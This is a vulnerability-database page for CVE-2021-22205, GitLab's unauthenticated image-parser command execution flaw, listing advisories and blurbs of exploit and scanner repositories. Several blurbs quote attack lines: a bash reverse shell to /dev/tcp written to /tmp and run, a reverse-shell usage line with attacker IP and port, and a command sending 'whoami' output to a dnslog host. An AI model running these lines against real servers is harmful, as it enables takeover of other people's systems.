CVE-2021-22205

Published: 23/04/2021 Updated: 12/07/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 678
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vulnerable Product

gitlab gitlab

Vendor Advisories

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in a remote command execution. The issue is fixed in GitLab versions 13.10.3, 13.9.6 and 13.8.8 ...

Exploits

This Metasploit module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. Exploitation will result in command execution as the git user ...
GitLab version 13.10.2 remote code execution exploit that provides a reverse shell ...

Github Repositories

CVE-2021-22205 RCE

CVE-2021-22205 CVE-2021-22205 RCE This tool is for sharing and exchange only; do not use it for unauthorized testing, otherwise the author bears no responsibility. -R string VPS to load tools eg: -R 127.0.0.1:8083 -T string Tool name eg: -T fscan -c string exec cmd eg: -c "id" (default "id") -host string reverse shell host -m string Method for using of CVE

Xiaoli-Tools Some scripts and Nuclei templates which I think are useful Table of content Overview Overview wmi-PS (wmi password spraying) gitlab-RCE (CVE-2021-22205) ecshop addcomputer-dpersist (with AD persistence option) sunlogin-fuzz (sunlogin remote desktop toolset RCE)

CVE-2021-22205 This is the deployment for Gitlab Enterprise Edition (13.9.5) that is vulnerable to CVE-2021-22205 using Docker container. Description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. Requirement:

A CVE-2021-22205 Gitlab RCE POC written in Golang

Golang-CVE-2021-22205-POC A bare bones CVE-2021-22205 Gitlab RCE POC written in Golang which affects Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8. I've been wanting to learn Golang for a while. I decided to write a POC for CVE-2021-22205 in Golang to help familiarize myself with the language. Please disregard what I am assuming is

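Convert Goby JSON-format PoCs to xray YAML-format PoCs

pocGoby2Xray Convert Goby JSON-format PoCs to xray YAML-format PoCs. Goby and Xray are community/commercial penetration testing tools widely used by network security enthusiasts (myself included), and the Nemo project also integrates calls to Xray for PoC scanning. The original intent of pocGoby2Xray is to "translate" the PoC rules and syntax of the two tools and then "convert" them, making it convenient to uniformly use Xray to invoke PoC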

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. Vuln Product Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8 Environment export GITLAB_HOME=/srv/gitlab sudo d

gitlab version

import requests import json import time name = "repositories/gitlab/gitlab-ce" def query_gitlabce_tags(): all_tags = [] query_tag_url = "hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1" while query_tag_url: resp = requests.get(query_tag_url) resp_json = json.loads(resp.text) tag_results = [i["

gitlab version index

Gitlab version index. Version number index, mainly split into gitlab-ee (931 entries) and gitlab-ce (934 entries). The tags can be crawled from the v2 API, about 10 pages: hub.docker.com/v2/repositories/gitlab/gitlab-ee/tags/?page_size=100&page=1 hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1 0x01 Analysis ╭─root@u

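Batch detection and exploitation tool for the CVE-2021-22205 unauthenticated vulnerability

0x01 Preface ⚠️ Disclaimer: this project is for learning and exchange only; do not use it for illegal, unauthorized testing! Changelog 112: added a one-click reverse shell function; optimized the related workflow. 111: added batch detection; IPs can be used directly in the text file without writing the protocol. 1030: added a Burp proxy pool; rewrote the command-line arguments; added batch and single-target detection of unauthenticated GitLab. Affected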

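Batch detection script for CVE-2021-22205

Gitlab-CVE-2021-22205 Multithreaded batch detection script for CVE-2021-22205. Uses dnslog, which can be combined with the PoC for detection. Uses multithreading for detection. Supports custom command execution.

CVE-2021-22205 GitLab unauthenticated remote code execution vulnerability EXP; removes the dependency on djvumake & djvulibre and can be used on the Windows platform

CVE-2021-22205 A fork based on mr-r3bot/Gitlab-CVE-2021-22205. Introduction: CVE-2021-22205: GitLab unauthenticated remote code execution vulnerability EXP. Removes the dependency on djvumake & djvulibre and generates the payload internally, so it can be run on the Windows platform. Usage # requires authorization python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <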

Write-up of THUCTF 2022

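THUCTF Write-Up by 4E1A607A Mobile checkin: get onto Discord through a proxy; the flag is in announcements. test your nc: connect with nc. survey: fill out the questionnaire, then base64-decode. Misc What Bad Intentions Could Little Klee Have? Three images: opening them in an image viewer (no alpha channel) identifies 3 groups, stegsolve (possibly with alpha channel) identifies two more, and the last group is dropped into Word and the brightness adjusted. flagmarket_level1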

PoC in single line bash

GitLab-preauth-RCE_CVE-2021-22205 single line bash PoC for GitLab preauth RCE (CVE-2021-22205)

CVE-2021-22205 Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8 Usage: Verify the vulnerability: python 22205exp.py -u url -v Execute a command: python 22205exp.py -u url -c command Batch verification: python 22205exp.py -f filename Reference: github.com/Al1ex/CVE-2021-22205

A repository of breaches of AWS customers

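Background Security is an exercise in managing risk. Reviewing the common root causes of security incidents is an effective way to guide prioritized remediation efforts. This repository seeks to index all publicly disclosed AWS customer security incidents with a known root cause. It will exclude incidents involving exposed data stores (e.g. S3 bucket leaks, exposed managed or ho

THUCTF 2022 Writeup I entered this contest as a one-person team. Treating it as a "contest of on-the-spot learning ability" and learning from all over the web, I solved 23 challenges in total, for a total score of 7618. Below I briefly give my approach to the challenges by category; the appendix collects all the scripts and code used, as well as some attempts that proved to be failures during the contest. The code in this document is generated by Org-mode and can be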

GitLab-CVE-2021-22205-scanner Usage $~ python3 GitLab-revshell.py -u gitlab.target.com -l [AttackerIP] -p [AttackerPort] Credit hackerone.com/reports/1154542 Referred code snippet from here: github.com/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploit.py Disclaimer: The script is for security analysis and research onl

GitLab-RCE-CVE-2021-22205 RCE graphical tool, written in Python and compiled to an EXE file. Usage: when executing commands, a dnslog address must be added to get the output back; the ceye platform is recommended. The output may take a long time to come back.

Pocsuite3 For CVE-2021-22205

CVE-2021-22205 Pocsuite3 For CVE-2021-22205, unauthenticated RCE.

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

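Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. Affected Version Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8 Vuln Impact Soon Reference githubc

Python-based crawler that fetches data from FOFA; requires a member cookie or the API

FOFA data collection tool fofa_crawler 1. Introduction: fofa_crawler is implemented in Python and uses a crawler to obtain data. It has two modes, crawler mode and API mode: users with API access can use API mode, which is more efficient, while users without FOFA API access can use crawler mode, which requires supplying the user's own cookie. It can also, for data collected from FOFA,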

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 Affected versions: Gitlab CE/EE < 13.10.3, Gitlab CE/EE < 13.9.6, Gitlab CE/EE < 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`dnslog" Obtaining the csrf-token: get the csrf-token via /users/sign_in, then use the preceding CVE-2021-22205 poc to construct the upload request and execute unauthen

CVE-2021-22205-getshell

CVE-2021-22205-getshell CVE-2021-22205-getshell Test version. Construct the command used for exploitation: echo 'bash -i >& /dev/tcp/1921681475/4444 0>&1' > /tmp/1sh chmod +x /tmp/1sh /bin/bash /tmp/1sh Use djvumake to generate the exploit image: import os payloads=[ "echo 'bash -i &

GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205 GitLab CE/EE Preauth RCE using ExifTool. This project is for learning only; if someone's rights have been violated, please contact me to remove the project, and the last: DO NOT USE IT ILLEGALLY. If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do no

This repository is made for my submission of the final project in CS 4770

Break it down! Traditionally, the goal of CTFs is trying to find hidden pieces of information, or activate some piece of code in order to export information. This is a bit different. The goal here is to bring down your target as quickly as possible. Seems simple, right? It may not be as easy as you might think! This CTF revolves around CVE-2021-22205, a Gitlab exploit involvi

Automated Gitlab RCE via CVE-2021-22205

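Automated-Gitlab-RCE Automated Gitlab RCE via CVE-2021-22205 example.py GitlabURL AttackerIP Added shell via python socket and pre-loaded commands to pop an RCE. Main payload used from github.com/Al1ex/CVE-2021-22205

CVE-2021-22205 detection script, with support for getshell and command execution

CVE-2021-22205 Because GitLab did not properly validate image files passed to the file parser, command execution results. An attacker can craft a malicious request to exploit this vulnerability and execute arbitrary commands on the target system, ultimately leading to the GitLab server being taken over. Since most of what is online lacks a reverse shell, I modified a script written online and added a one-click getshell function. Affected versions 11.9 <= GitLab(CE/EE)&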

A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab

gitlab-cve-2021-22205 A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab Usage Usage: cve-2021-22205.sh [options] Options: -h,--help Show this help -t,--target Set the target server (i.e. "gitlab.example.com") -i,--reverse-ip Set the IP to connect back to -p,--reverse-port Set the port to connect back to -c,--comman

HS-CTF-22 Helt Sikker CTF 2022 Challenges Web Vaccine - SQLi Girl Scouts - Cookie modification Bradley Urglar's API - Insecure direct object reference (from NAV IT) Repo - CVE-2021-22205 gitlab RCE Protectr - robots.txt Inspector Gadget - Flag in page source Crypto Long lost message - Playfair cipher Hexadecimal - Hex to ASCII Exclusive Or - XOR with known key Mario 64

Gitlab CE/EE RCE unauthenticated remote code execution vulnerability POC && EXP CVE-2021-22205

CVE-2021-22205 Description POC for CVE-2021-22205: Gitlab CE/EE RCE unauthenticated remote code execution vulnerability POC && EXP create by antx at 2021-10-29 Detail An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command

a Curated list of gitlab vulnerability

Gitlab-CVE a Curated list of gitlab vulnerability CVE-2021-22205 [critical] An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. target.com/users/sign_in CVE-2021-22214 [

Recent Articles

DDoS attacks in Q4 2021
Securelist • Alexander Gutnikov • 10 Feb 2022

News roundup Q4 2021 saw the appearance of several new DDoS botnets. A zombie network, named Abcbot by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe cryptojacking group. This is further evidence that the same botn...